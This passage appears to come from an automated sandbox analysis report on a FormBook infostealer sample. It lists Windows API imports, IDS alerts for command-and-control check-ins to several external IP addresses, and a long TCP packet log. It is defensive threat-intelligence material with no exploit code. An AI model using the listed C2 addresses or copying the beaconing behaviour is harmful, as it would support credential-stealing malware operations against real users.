SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-11T04:50:45.119882+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49743	156.226.63.13	80	TCP
2024-12-11T04:50:45.119882+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49743	156.226.63.13	80	TCP
2024-12-11T04:50:58.497436+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49779	103.120.80.111	80	TCP
2024-12-11T04:51:01.162817+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49785	103.120.80.111	80	TCP
2024-12-11T04:51:03.835191+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49792	103.120.80.111	80	TCP
2024-12-11T04:51:06.514751+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49803	103.120.80.111	80	TCP
2024-12-11T04:51:06.514751+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49803	103.120.80.111	80	TCP
2024-12-11T04:51:13.697181+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49819	38.180.232.109	80	TCP
2024-12-11T04:51:16.397420+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49825	38.180.232.109	80	TCP
2024-12-11T04:51:19.144276+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49831	38.180.232.109	80	TCP
2024-12-11T04:51:21.719194+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49842	38.180.232.109	80	TCP
2024-12-11T04:51:21.719194+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49842	38.180.232.109	80	TCP
2024-12-11T04:51:28.700584+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49858	172.67.158.81	80	TCP
2024-12-11T04:51:31.372469+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49864	172.67.158.81	80	TCP
2024-12-11T04:51:34.028762+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49870	172.67.158.81	80	TCP
2024-12-11T04:51:36.729307+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49876	172.67.158.81	80	TCP
2024-12-11T04:51:36.729307+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49876	172.67.158.81	80	TCP
2024-12-11T04:51:43.656842+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49897	208.91.197.27	80	TCP
2024-12-11T04:51:46.298121+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49903	208.91.197.27	80	TCP
2024-12-11T04:51:48.968786+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49909	208.91.197.27	80	TCP
2024-12-11T04:51:51.917630+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49915	208.91.197.27	80	TCP
2024-12-11T04:51:51.917630+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49915	208.91.197.27	80	TCP
2024-12-11T04:51:58.789056+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49936	172.67.182.198	80	TCP
2024-12-11T04:52:01.448282+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49942	172.67.182.198	80	TCP
2024-12-11T04:52:04.122102+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49948	172.67.182.198	80	TCP
2024-12-11T04:52:06.804180+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49954	172.67.182.198	80	TCP
2024-12-11T04:52:06.804180+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49954	172.67.182.198	80	TCP
2024-12-11T04:52:13.920650+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49975	209.74.79.40	80	TCP
2024-12-11T04:52:16.585115+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49981	209.74.79.40	80	TCP
2024-12-11T04:52:19.304264+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49987	209.74.79.40	80	TCP
2024-12-11T04:52:21.917490+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49993	209.74.79.40	80	TCP
2024-12-11T04:52:21.917490+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49993	209.74.79.40	80	TCP
2024-12-11T04:52:29.278827+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50014	13.228.81.39	80	TCP
2024-12-11T04:52:31.935159+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50020	13.228.81.39	80	TCP
2024-12-11T04:52:34.606926+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50026	13.228.81.39	80	TCP
2024-12-11T04:52:37.334499+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50031	13.228.81.39	80	TCP
2024-12-11T04:52:37.334499+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50031	13.228.81.39	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 04:50:40.412657976 CET	49743	80	192.168.2.4	156.226.63.13
Dec 11, 2024 04:50:40.532497883 CET	80	49743	156.226.63.13	192.168.2.4
Dec 11, 2024 04:50:40.532612085 CET	49743	80	192.168.2.4	156.226.63.13
Dec 11, 2024 04:50:40.606653929 CET	49743	80	192.168.2.4	156.226.63.13
Dec 11, 2024 04:50:40.726033926 CET	80	49743	156.226.63.13	192.168.2.4
Dec 11, 2024 04:50:45.119699001 CET	80	49743	156.226.63.13	192.168.2.4
Dec 11, 2024 04:50:45.119739056 CET	80	49743	156.226.63.13	192.168.2.4
Dec 11, 2024 04:50:45.119882107 CET	49743	80	192.168.2.4	156.226.63.13
Dec 11, 2024 04:50:45.123187065 CET	49743	80	192.168.2.4	156.226.63.13
Dec 11, 2024 04:50:45.242427111 CET	80	49743	156.226.63.13	192.168.2.4
Dec 11, 2024 04:50:56.750209093 CET	49779	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:50:56.981034040 CET	80	49779	103.120.80.111	192.168.2.4
Dec 11, 2024 04:50:56.981170893 CET	49779	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:50:56.996035099 CET	49779	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:50:57.115333080 CET	80	49779	103.120.80.111	192.168.2.4
Dec 11, 2024 04:50:58.497436047 CET	49779	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:50:58.497999907 CET	80	49779	103.120.80.111	192.168.2.4
Dec 11, 2024 04:50:58.498078108 CET	49779	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:50:58.616863012 CET	80	49779	103.120.80.111	192.168.2.4
Dec 11, 2024 04:50:59.518802881 CET	49785	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:50:59.638195038 CET	80	49785	103.120.80.111	192.168.2.4
Dec 11, 2024 04:50:59.642565012 CET	49785	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:50:59.656758070 CET	49785	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:50:59.776009083 CET	80	49785	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:01.162755013 CET	80	49785	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:01.162817001 CET	49785	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:51:01.169282913 CET	49785	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:51:01.290003061 CET	80	49785	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:02.189766884 CET	49792	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:51:02.309118986 CET	80	49792	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:02.309180021 CET	49792	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:51:02.324479103 CET	49792	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:51:02.443912983 CET	80	49792	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:02.443923950 CET	80	49792	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:02.444031954 CET	80	49792	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:02.444040060 CET	80	49792	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:02.444153070 CET	80	49792	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:02.444160938 CET	80	49792	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:02.444257021 CET	80	49792	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:02.444346905 CET	80	49792	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:02.444355011 CET	80	49792	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:03.835136890 CET	80	49792	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:03.835191011 CET	49792	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:51:03.844250917 CET	49792	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:51:03.963449001 CET	80	49792	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:04.864895105 CET	49803	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:51:04.984179020 CET	80	49803	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:04.984257936 CET	49803	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:51:04.993350029 CET	49803	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:51:05.112617016 CET	80	49803	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:06.514564991 CET	80	49803	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:06.514604092 CET	80	49803	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:06.514728069 CET	80	49803	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:06.514740944 CET	80	49803	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:06.514750957 CET	49803	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:51:06.514826059 CET	49803	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:51:06.514853001 CET	80	49803	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:06.514864922 CET	80	49803	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:06.514908075 CET	49803	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:51:06.515535116 CET	80	49803	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:06.515582085 CET	49803	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:51:06.555943012 CET	49803	80	192.168.2.4	103.120.80.111
Dec 11, 2024 04:51:06.675213099 CET	80	49803	103.120.80.111	192.168.2.4
Dec 11, 2024 04:51:12.337590933 CET	49819	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:12.456949949 CET	80	49819	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:12.457067966 CET	49819	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:12.500242949 CET	49819	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:12.619546890 CET	80	49819	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:13.696995974 CET	80	49819	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:13.697079897 CET	80	49819	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:13.697180986 CET	49819	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:14.013144970 CET	49819	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:15.031809092 CET	49825	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:15.151046038 CET	80	49825	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:15.151163101 CET	49825	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:15.166853905 CET	49825	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:15.286143064 CET	80	49825	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:16.397347927 CET	80	49825	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:16.397361994 CET	80	49825	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:16.397419930 CET	49825	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:16.669384956 CET	49825	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:17.695123911 CET	49831	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:17.814490080 CET	80	49831	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:17.814723969 CET	49831	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:17.832076073 CET	49831	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:17.978487015 CET	80	49831	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:17.978502989 CET	80	49831	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:17.978544950 CET	80	49831	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:17.978565931 CET	80	49831	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:17.978636980 CET	80	49831	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:17.978681087 CET	80	49831	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:17.990880966 CET	80	49831	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:17.990896940 CET	80	49831	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:18.048005104 CET	80	49831	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:19.144105911 CET	80	49831	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:19.144119024 CET	80	49831	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:19.144275904 CET	49831	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:19.341212988 CET	49831	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:20.362864971 CET	49842	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:20.482189894 CET	80	49842	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:20.482297897 CET	49842	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:20.552975893 CET	49842	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:20.672312021 CET	80	49842	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:21.718976974 CET	80	49842	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:21.719145060 CET	80	49842	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:21.719193935 CET	49842	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:21.721590996 CET	49842	80	192.168.2.4	38.180.232.109
Dec 11, 2024 04:51:21.840797901 CET	80	49842	38.180.232.109	192.168.2.4
Dec 11, 2024 04:51:27.059721947 CET	49858	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:27.179415941 CET	80	49858	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:27.179569960 CET	49858	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:27.196443081 CET	49858	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:27.315742016 CET	80	49858	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:28.700583935 CET	49858	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:28.731141090 CET	80	49858	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:28.731328011 CET	49858	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:28.731714964 CET	80	49858	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:28.731724977 CET	80	49858	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:28.731790066 CET	49858	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:28.732098103 CET	49858	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:28.820195913 CET	80	49858	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:28.820281029 CET	49858	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:29.721398115 CET	49864	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:29.840771914 CET	80	49864	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:29.840970039 CET	49864	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:29.856681108 CET	49864	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:29.976002932 CET	80	49864	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:31.372468948 CET	49864	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:31.383346081 CET	80	49864	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:31.383435011 CET	49864	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:31.384581089 CET	80	49864	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:31.384635925 CET	49864	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:31.491879940 CET	80	49864	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:31.491928101 CET	49864	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:32.391833067 CET	49870	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:32.511094093 CET	80	49870	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:32.511321068 CET	49870	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:32.526695967 CET	49870	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:32.646281004 CET	80	49870	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:32.646291971 CET	80	49870	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:32.646305084 CET	80	49870	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:32.646312952 CET	80	49870	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:32.646322012 CET	80	49870	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:32.646328926 CET	80	49870	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:32.646398067 CET	80	49870	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:32.646410942 CET	80	49870	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:32.646447897 CET	80	49870	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:34.028762102 CET	49870	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:34.128335953 CET	80	49870	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:34.128408909 CET	49870	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:34.129868984 CET	80	49870	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:34.129924059 CET	49870	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:34.129926920 CET	80	49870	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:34.129971981 CET	49870	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:34.148109913 CET	80	49870	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:34.148180962 CET	49870	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:35.047310114 CET	49876	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:35.166672945 CET	80	49876	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:35.166786909 CET	49876	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:35.175901890 CET	49876	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:35.295105934 CET	80	49876	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:36.729027033 CET	80	49876	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:36.729120970 CET	80	49876	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:36.729306936 CET	49876	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:36.729680061 CET	80	49876	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:36.729809999 CET	80	49876	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:36.729856968 CET	49876	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:36.734237909 CET	49876	80	192.168.2.4	172.67.158.81
Dec 11, 2024 04:51:36.853533030 CET	80	49876	172.67.158.81	192.168.2.4
Dec 11, 2024 04:51:42.356647015 CET	49897	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:42.475958109 CET	80	49897	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:42.476214886 CET	49897	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:42.490637064 CET	49897	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:42.610102892 CET	80	49897	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:43.656692982 CET	80	49897	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:43.656841993 CET	49897	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:43.997472048 CET	49897	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:44.116652966 CET	80	49897	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:45.016143084 CET	49903	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:45.135852098 CET	80	49903	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:45.136068106 CET	49903	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:45.155157089 CET	49903	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:45.274524927 CET	80	49903	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:46.297961950 CET	80	49903	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:46.298120975 CET	49903	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:46.669450045 CET	49903	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:46.788727999 CET	80	49903	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:47.688776016 CET	49909	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:47.808051109 CET	80	49909	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:47.808296919 CET	49909	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:47.824281931 CET	49909	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:47.943628073 CET	80	49909	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:47.943679094 CET	80	49909	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:47.943792105 CET	80	49909	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:47.943800926 CET	80	49909	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:47.943888903 CET	80	49909	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:47.943900108 CET	80	49909	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:47.943984032 CET	80	49909	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:47.943999052 CET	80	49909	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:47.944010019 CET	80	49909	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:48.968738079 CET	80	49909	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:48.968786001 CET	49909	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:49.325714111 CET	49909	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:49.445152044 CET	80	49909	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:50.344542027 CET	49915	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:50.463824987 CET	80	49915	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:50.463922024 CET	49915	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:50.473486900 CET	49915	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:50.592713118 CET	80	49915	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:51.917220116 CET	80	49915	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:51.917275906 CET	80	49915	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:51.917287111 CET	80	49915	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:51.917629957 CET	49915	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:51.962696075 CET	80	49915	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:51.962786913 CET	80	49915	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:51.962814093 CET	49915	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:51.962831974 CET	49915	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:51.965758085 CET	49915	80	192.168.2.4	208.91.197.27
Dec 11, 2024 04:51:52.084945917 CET	80	49915	208.91.197.27	192.168.2.4
Dec 11, 2024 04:51:57.369290113 CET	49936	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:51:57.488725901 CET	80	49936	172.67.182.198	192.168.2.4
Dec 11, 2024 04:51:57.488786936 CET	49936	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:51:57.503652096 CET	49936	80	192.168.2.4	172.67.182.198
Dec 11, 2024 04:51:57.622980118 CET	80	49936	172.67.182.198	192.168.2.4
Dec 11, 2024 04:51:58.787681103 CET	80	49936	172.67.182.198	192.168.2.4
Dec 11, 2024 04:51:58.788957119 CET	80	49936	172.67.182.198	192.168.2.4
